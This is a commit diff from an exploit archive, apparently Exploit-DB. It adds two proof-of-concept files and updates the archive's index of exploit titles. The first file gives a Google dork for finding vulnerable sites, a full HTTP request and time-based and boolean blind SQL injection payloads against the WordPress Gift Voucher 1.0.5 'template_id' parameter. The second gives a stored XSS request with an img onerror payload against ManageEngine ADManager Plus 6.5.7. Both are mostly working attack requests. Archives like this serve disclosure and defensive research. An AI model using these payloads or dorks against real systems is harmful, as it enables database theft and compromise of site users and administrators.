DB: 2018-08-27
2 changes to exploits/shellcodes Apache James 2.2 - SMTP Denial of Service Apache James Server 2.2 - SMTP Denial of Service SSH2 3.0 - Restricted Shell Escaping Command Execution SSH2 3.0 - Restricted Shell Escape (Command Execution) WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
This commit is contained in:
parent
ec10fd3afb
commit
aaa959b29c
3 changed files with 92 additions and 2 deletions
38
exploits/php/webapps/45255.txt
Normal file
38
exploits/php/webapps/45255.txt
Normal file
|
@ -0,0 +1,38 @@
|
||||||
|
# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
|
||||||
|
# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
|
||||||
|
# Date: 2018-08-23
|
||||||
|
# Exploit Author: Renos Nikolaou
|
||||||
|
# Software Link: https://wordpress.org/plugins/gift-voucher/
|
||||||
|
# Vendor Homepage: http://www.codemenschen.at/
|
||||||
|
# Version: 1.0.5
|
||||||
|
# Tested on: Windows 10
|
||||||
|
# CVE: N/A
|
||||||
|
# Description : The vulnerability allows an attacker to inject sql commands
|
||||||
|
# on 'template_id' parameter.
|
||||||
|
|
||||||
|
# PoC - Blind SQLi :
|
||||||
|
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: domain.com
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Referer: http://domain.com/gift-voucher/
|
||||||
|
Content-Length: 62
|
||||||
|
Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
action=wpgv_doajax_front_template&template_id=1 and sleep(15)#
|
||||||
|
|
||||||
|
Parameter: template_id (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||||
|
Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
|
||||||
|
Vector: AND [INFERENCE]
|
||||||
|
---
|
||||||
|
web application technology: Apache
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
banner: '5.5.59'
|
50
exploits/windows_x86-64/webapps/45256.txt
Normal file
50
exploits/windows_x86-64/webapps/45256.txt
Normal file
|
@ -0,0 +1,50 @@
|
||||||
|
# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
|
||||||
|
# Date: 2018-08-21
|
||||||
|
# Exploit Author: Ismail Tasdelen
|
||||||
|
# Vendor Homepage: https://www.manageengine.com/
|
||||||
|
# Hardware Link : https://www.manageengine.com/products/ad-manager/
|
||||||
|
# Software : ZOHO Corp ManageEngine ADManager Plus
|
||||||
|
# Product Version: 6.5.7
|
||||||
|
# Vulernability Type : Cross-site Scripting
|
||||||
|
# Vulenrability : Stored XSS
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
# Zoho ManageEngine ADManager Plus 6.5.7 allows XSS on the "Workflow Delegation" "Requesters" screen.
|
||||||
|
|
||||||
|
# HTTP Request Header :
|
||||||
|
|
||||||
|
Request URL: http://TARGET:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
|
||||||
|
Request Method: POST
|
||||||
|
Status Code: 200 OK
|
||||||
|
Remote Address: TARGET:8080
|
||||||
|
Referrer Policy: no-referrer-when-downgrade
|
||||||
|
Accept: */*
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||||
|
Connection: keep-alive
|
||||||
|
Content-Length: 320
|
||||||
|
Content-type: application/x-www-form-urlencoded;charset=UTF-8
|
||||||
|
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=3CED862790101335DD0EB05EE42E4972; JSESSIONIDSSO=3E6785DB8D6DFD46D6C729579E68418D
|
||||||
|
Host: TARGET:8080
|
||||||
|
Origin: http://TARGET:8080
|
||||||
|
Referer: http://TARGET:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
|
||||||
|
# HTTP Response Header :
|
||||||
|
|
||||||
|
Content-Length: 3753
|
||||||
|
Content-Type: text/html;charset=UTF-8
|
||||||
|
Date: Tue, 14 Aug 2018 10:14:32 GMT
|
||||||
|
Server: Apache-Coyote/1.1
|
||||||
|
X-Content-Type-Options: nosniff
|
||||||
|
X-XSS-Protection: 1
|
||||||
|
|
||||||
|
# Query String Parameters :
|
||||||
|
|
||||||
|
methodToCall: listTechnicianRows
|
||||||
|
|
||||||
|
# Form Data :
|
||||||
|
|
||||||
|
params: {"startIndex":1,"range":10,"searchText":"\"><img src=x onerror=alert('TESTER')>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
|
||||||
|
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
|
|
@ -3569,7 +3569,7 @@ id,file,description,date,author,type,platform,port
|
||||||
27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux,
|
27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux,
|
||||||
27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows,
|
27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows,
|
||||||
27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow",2006-05-29,kcope,dos,windows,
|
27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow",2006-05-29,kcope,dos,windows,
|
||||||
27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
|
27915,exploits/multiple/dos/27915.pl,"Apache James Server 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple,
|
||||||
27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux,
|
27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux,
|
||||||
27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)",2006-05-31,Mr.Niega,dos,windows,
|
27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)",2006-05-31,Mr.Niega,dos,windows,
|
||||||
27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",dos,hardware,
|
27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",dos,hardware,
|
||||||
|
@ -8286,7 +8286,7 @@ id,file,description,date,author,type,platform,port
|
||||||
21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",local,linux,
|
21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",local,linux,
|
||||||
21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",local,openbsd,
|
21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",local,openbsd,
|
||||||
21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",local,linux,
|
21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",local,linux,
|
||||||
21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,local,linux,
|
21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escape (Command Execution)",2002-04-18,A.Dimitrov,local,linux,
|
||||||
21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,local,bsd,
|
21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,local,bsd,
|
||||||
21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,local,unix,
|
21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,local,unix,
|
||||||
21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",local,unix,
|
21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",local,unix,
|
||||||
|
@ -39856,3 +39856,5 @@ id,file,description,date,author,type,platform,port
|
||||||
45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
|
45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
|
||||||
45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
|
45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
|
||||||
45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,
|
45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,
|
||||||
|
45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,
|
||||||
|
45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue